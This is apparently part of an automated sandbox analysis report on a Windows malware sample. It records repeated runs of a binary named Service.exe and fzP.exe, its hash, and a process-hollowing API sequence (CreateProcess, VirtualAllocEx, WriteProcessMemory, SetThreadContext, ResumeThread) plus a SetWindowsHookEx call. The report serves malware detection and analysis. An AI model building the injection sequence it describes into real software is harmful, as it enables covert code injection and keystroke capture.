Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x7ff6068e0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xa10000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xd0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x6a0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xe40000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xd60000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xf40000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:16:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xf0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xc70000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x1d0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xb30000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xa70000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xbd0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:16:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x60000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	1

Executed Functions

Function 030D0D33 Relevance: 1.8, Strings: 1, Instructions: 584
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 030D14C2

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 81ec245033a761a848a4f6d6ac8e88575a30e0b0b1523022f15ac35a7c3a0227
Instruction ID: 64a2d0cb3d537821306b04a70a84592e169a1d63c8bc1dbc17d9ff6bb969e20c
Opcode Fuzzy Hash: 81ec245033a761a848a4f6d6ac8e88575a30e0b0b1523022f15ac35a7c3a0227
Instruction Fuzzy Hash: 5C52D174D012298FDB68DF69C994BDDBBF2BF89300F1485EA9409AB290DB345E85CF41

Function 030D1B9C Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 030D1D79

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 74287fb549a1a1829b9b44c1f522bda60d62bb5eda03187e45386990efe996ff
Instruction ID: d3b830e9778f24e7c9b7a30ad6d3526acd7527df6c733f73e23c1b2f05fd7ac9
Opcode Fuzzy Hash: 74287fb549a1a1829b9b44c1f522bda60d62bb5eda03187e45386990efe996ff
Instruction Fuzzy Hash: F181D5B4D00229DFDB65CF69C880BDDBBF5BB09300F1491AAE508B7250DB30AA85CF55

Function 030D1BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 030D1D79

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 03c6f28ee47bcb9cfcaf68c1fd43eb007783a2409f63fd08545fcd2f869e7fac
Instruction ID: e93134242603c3bf4dcdd6467475fab1a6ce7060ed42015e56e60337dd49fc74
Opcode Fuzzy Hash: 03c6f28ee47bcb9cfcaf68c1fd43eb007783a2409f63fd08545fcd2f869e7fac
Instruction Fuzzy Hash: 5281D3B4D00219DFDB65CFA9C880BDDBBF5BB09300F1491AAE509B7250DB30AA89CF55

Function 030D21F0 Relevance: 1.6, APIs: 1, Instructions: 113
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030D22C6

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4d4464d1d64ea7ab6356d493f4bf47c686022d97205569ea5271ec2df80047a7
Instruction ID: 4aa94d1a9dbb686e7f718ea1308716d169bf4615e1141d61a379cc9af1ce70ea
Opcode Fuzzy Hash: 4d4464d1d64ea7ab6356d493f4bf47c686022d97205569ea5271ec2df80047a7
Instruction Fuzzy Hash: A2418AB5D052599FCB00CFA9D984AEEFBF5BB49310F24942AE818B7210D335AA45CF64

Function 030D21F8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030D22C6

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3a74e0fb826dd5ce399f1afa2fc417a93333a0db82073d05b3b69d040a610c68
Instruction ID: 6e0f332cd3d53cb78fb21c9061b56f8b16b5ed972a6a8920fea8f766cfdb150e
Opcode Fuzzy Hash: 3a74e0fb826dd5ce399f1afa2fc417a93333a0db82073d05b3b69d040a610c68
Instruction Fuzzy Hash: 344169B5D052589FCB00CFA9D984ADEFBF5BB49310F24942AE818B7210D375AA45CF68

Function 030D1FD0 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030D2085

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5e73baf8bf4a23662226b96452616bca29cdc2db29c50da00619f578e242a308
Instruction ID: 1536455d042f8ce1ea708aa9a5dd2747ce55dae7250019ba77f9edadcfaffb32
Opcode Fuzzy Hash: 5e73baf8bf4a23662226b96452616bca29cdc2db29c50da00619f578e242a308
Instruction Fuzzy Hash: 8E419AB9D052589FCF10CFA9E484ADEFBF5BB19310F14942AE814B7210C335A945DF68

Function 030D20E8 Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 030D2195

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 22e16a76307ed4ed1f95338ea603a7ac712da995494763bc8a46cc9293babe65
Instruction ID: 9bf497bf5b92c88aa41c5d0192675ee5aad3c26591fba505c33adbdd9fadb6b3
Opcode Fuzzy Hash: 22e16a76307ed4ed1f95338ea603a7ac712da995494763bc8a46cc9293babe65
Instruction Fuzzy Hash: A03178B9D012599FCF10CFA9D984A9EFBF5BB19310F10942AE928B7310D335A946CF64

Function 030D1FD8 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030D2085

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8e56e3dd0e2cd6b798b2412cff436d6afa449805f5191d7f2aa1f2fbd87b7422
Instruction ID: 946d142f0746b173b7589048694ebb4bce5127b13aeb37138fe0ab8a540cd3ad
Opcode Fuzzy Hash: 8e56e3dd0e2cd6b798b2412cff436d6afa449805f5191d7f2aa1f2fbd87b7422
Instruction Fuzzy Hash: F03179B9D042589FCF10CFA9E584ADEFBF5BB19310F14942AE814B7210D335A945CF68

Function 030D20F0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 030D2195

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eefc3cda08f975262eee36ca676225d2230255793cadc3ba3d7269a5421c952d
Instruction ID: 7b5b14730181478626b0e82e15a905a84efc369d0cb13e156cb63654969f7977
Opcode Fuzzy Hash: eefc3cda08f975262eee36ca676225d2230255793cadc3ba3d7269a5421c952d
Instruction Fuzzy Hash: 763178B9D012589FCF10CFA9D984A9EFBF5BB19310F10942AE924B7310D335A946CF65

Function 030D1EC8 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 030D1F72

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 67e5f736dc1c53776dd798d936bb7b6edfccf36bf3928050689cda72275fce72
Instruction ID: ccc684f2c3dfecd0b7bb9f91cc4c769e0821e11fee9235068f833941a4f525cc
Opcode Fuzzy Hash: 67e5f736dc1c53776dd798d936bb7b6edfccf36bf3928050689cda72275fce72
Instruction Fuzzy Hash: 93319BB5D012589FCB14CFAAD584ADEFBF1BB49310F24802AE418BB351D778A945CF64

Function 030D1EC1 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 030D1F72

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c26430efa80d0eda8cfe17be7fa736adfa8d3af55ab496da0e118039259a5e3c
Instruction ID: 59b6b931102ab934d1ef9c49112694287ce65e5bf07d5d1e6f509feb997646bb
Opcode Fuzzy Hash: c26430efa80d0eda8cfe17be7fa736adfa8d3af55ab496da0e118039259a5e3c
Instruction Fuzzy Hash: BC31BBB5D012599FCB14CFAAD884ADEFBF1BF49314F24802AE428BB251C338A945CF54

Function 030D2331 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 030D23AE

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a324b463fb156e6c40d58d12d61952d4820ac1707dffdfd82f68151e01e629c9
Instruction ID: 29fbc001bc1c85ba64e4fc249e2f27d0e1ae4c1351b278269d37b28f26f18d62
Opcode Fuzzy Hash: a324b463fb156e6c40d58d12d61952d4820ac1707dffdfd82f68151e01e629c9
Instruction Fuzzy Hash: 352199B9D002199FCB10CFA9D484ADEFBF4EB49310F24941AE828B7310D335A945CFA8

Function 030D2338 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 030D23AE

Memory Dump Source

Source File: 00000002.00000002.2048501259.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_30d0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 306eaadaf1a05ad90943b0d97bbcbf1af3285c674aa79021e9bb6505c260f140
Instruction ID: 57501711543c4ec93a67ecd4b02287912474c5467f1eebb823617dfa79682194
Opcode Fuzzy Hash: 306eaadaf1a05ad90943b0d97bbcbf1af3285c674aa79021e9bb6505c260f140
Instruction Fuzzy Hash: 6D2188B8D002199FCB10CFA9D484ADEFBF4AB49310F24945AE819B7310D335A945CFA9

Analysis Process: fzP.exePID: 3812, Parent PID: 2748COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	14
Total number of Limit Nodes:	2

Executed Functions

Function 0262713B Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026271BE
GetCurrentThread.KERNEL32 ref: 026271FB
GetCurrentProcess.KERNEL32 ref: 02627238
GetCurrentThreadId.KERNEL32 ref: 02627291

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6ca71968001bbd7d459789ad2488b23b0588ab6be9044bc592e7709353f4e7b7
Instruction ID: 559374aab8db38a1253d0354491995518b2a558435fa8a1f6410f434221c81b4
Opcode Fuzzy Hash: 6ca71968001bbd7d459789ad2488b23b0588ab6be9044bc592e7709353f4e7b7
Instruction Fuzzy Hash: 315144B0D016498FDB14CFA9D588BAEBBF1AB88304F24C46DE419A7350C7345989CF62

Function 02627140 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026271BE
GetCurrentThread.KERNEL32 ref: 026271FB
GetCurrentProcess.KERNEL32 ref: 02627238
GetCurrentThreadId.KERNEL32 ref: 02627291

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7eda3268360eb7d2d00b5c739f2e0c0378206662bc781702396f68739d98079a
Instruction ID: a807e4b3ffa431dc58509d876e833203835fd6774024244715699d004d7c14c2
Opcode Fuzzy Hash: 7eda3268360eb7d2d00b5c739f2e0c0378206662bc781702396f68739d98079a
Instruction Fuzzy Hash: D45143B0D016098FDB14CFA9D588B9EFBF1AB88314F20C46DE419A7350C7346989CF66

Function 02627380 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0262740F

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 37aefc94f5f3578ce3080e5fecf62ac80c7c18c165b945aa550dad79381cc8e6
Instruction ID: 37df9b262333784d58232d4449e765e27a53e9abac01cd73c695b82ef8490711
Opcode Fuzzy Hash: 37aefc94f5f3578ce3080e5fecf62ac80c7c18c165b945aa550dad79381cc8e6
Instruction Fuzzy Hash: 90516AB5D802449FE710DFA4E448AADBBF5FB8D300F20896DE955AB381DB745851CF50

Function 02627388 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0262740F

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b587a61f143e1b2740f561a26496d3cedddee3d0a9d4cdf7835db2bd2d4e300c
Instruction ID: 6d9a04ea4ec8b5daedffa57ffa740ee82b0d99be90c8bb1eb1e2d88a822de8ee
Opcode Fuzzy Hash: b587a61f143e1b2740f561a26496d3cedddee3d0a9d4cdf7835db2bd2d4e300c
Instruction Fuzzy Hash: BE21C2B5D002599FDB10CFAAD984ADEFFF8EB48310F14845AE918A3350D374A954CFA5

Function 02622280 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02622303

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c9820bbcd34dd0a383991baef683aa4c2400520ac1f7446b7e0eccbd426c6bb1
Instruction ID: 337013d246d9377f205ad16c9ca33a0da1a78bb9147ff6732a132aa9b0fc4993
Opcode Fuzzy Hash: c9820bbcd34dd0a383991baef683aa4c2400520ac1f7446b7e0eccbd426c6bb1
Instruction Fuzzy Hash: FF2157B1D002598FCB14CFA9C948BEEFBF0FB88314F10842AD859A7250C775A945CFA1

Function 02622288 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02622303

Memory Dump Source

Source File: 00000003.00000002.3322571122.0000000002620000.00000040.00000800.00020000.00000000.sdmp, Offset: 02620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2620000_fzP.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 56c194131fddaf7227ed9570f405b83708e97e5426f5d632a6c95ef2d38b77cc
Instruction ID: 9be196bdd52bf451d9cb31d7b0a6145f55aa2f4acc50861b02148374b822a45d
Opcode Fuzzy Hash: 56c194131fddaf7227ed9570f405b83708e97e5426f5d632a6c95ef2d38b77cc
Instruction Fuzzy Hash: D52113B5D002198FCB14DFAAC944BEEFBF5BB88314F10842AE419A7250C774A945CFA1

Function 00CFD414 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321029605.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cfd000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4fe8002aecdfa6ffc2dd43fa2f149547da7e956c709e4339fa8ffabc9dd919
Instruction ID: 15ee6095987278c3ab7950385ac7d64d264c81adb68b52902c61f539ef5e5aa2
Opcode Fuzzy Hash: dd4fe8002aecdfa6ffc2dd43fa2f149547da7e956c709e4339fa8ffabc9dd919
Instruction Fuzzy Hash: E52145B1504248EFCB05DF14D8C0F26BF66FB94324F24C569EA0A0B256C336E816D6A3

Function 00D0D0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321121130.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d0d000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b5634d157720909a513a4b4237b03ff3499ee51ab0cff2f13e8bb6974aeb74
Instruction ID: 6485221a41edb3912f5b3ae9b00f492ecd151064ea63065075bdeb7d85e360f3
Opcode Fuzzy Hash: 96b5634d157720909a513a4b4237b03ff3499ee51ab0cff2f13e8bb6974aeb74
Instruction Fuzzy Hash: 432125B1504304DFDB04DF54D9C0B26BBA6EB84314F24C56ED84D4B286CB36D806CA72

Function 00D0D01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321121130.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d0d000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17e82ed79c1427308d0b6973b77b4b2d6b81f0deecc2edf252bab57c900b4825
Instruction ID: aa25d5bbe255095918143230188be5ecbdca1c1bae6569326f91ee3946bae04f
Opcode Fuzzy Hash: 17e82ed79c1427308d0b6973b77b4b2d6b81f0deecc2edf252bab57c900b4825
Instruction Fuzzy Hash: 3721FFB1604200EFDB14DF64D9C0B26BBA6EB84318F24C56EE94E4B292C37AD847C671

Function 00D0D005 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321121130.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d0d000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3442ca4585a03edb61b67bcc84e563c7214b9908458cf9def13677f38ccd9ef2
Instruction ID: 83665557f3a80fbc1b6e96be293471be0c9b8139d733a21b4aafba8cd6901ab7
Opcode Fuzzy Hash: 3442ca4585a03edb61b67bcc84e563c7214b9908458cf9def13677f38ccd9ef2
Instruction Fuzzy Hash: 16216F755093808FDB12CF24D994715BF71AB46314F29C5EBD88D8B6A3C33A984ACB62

Function 00CFD40F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321029605.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cfd000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: d4fa2ff973f10e64988b05d700cf6092924d2e896d62f8296dd95061b483c186
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: 4F112672404284CFCB12CF00D5C4B26BF72FB94324F24C1A9D90A0B656C33AE95ACBA2

Function 00D0D0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3321121130.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d0d000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 82122903535df06f579b65d5d58584b635c541a618d43d0e213541eb72785332
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 6811BE75504344CFDB05CF54D9C4B15BB62FB44314F28C6AAD8494B696C33AD85ACB62

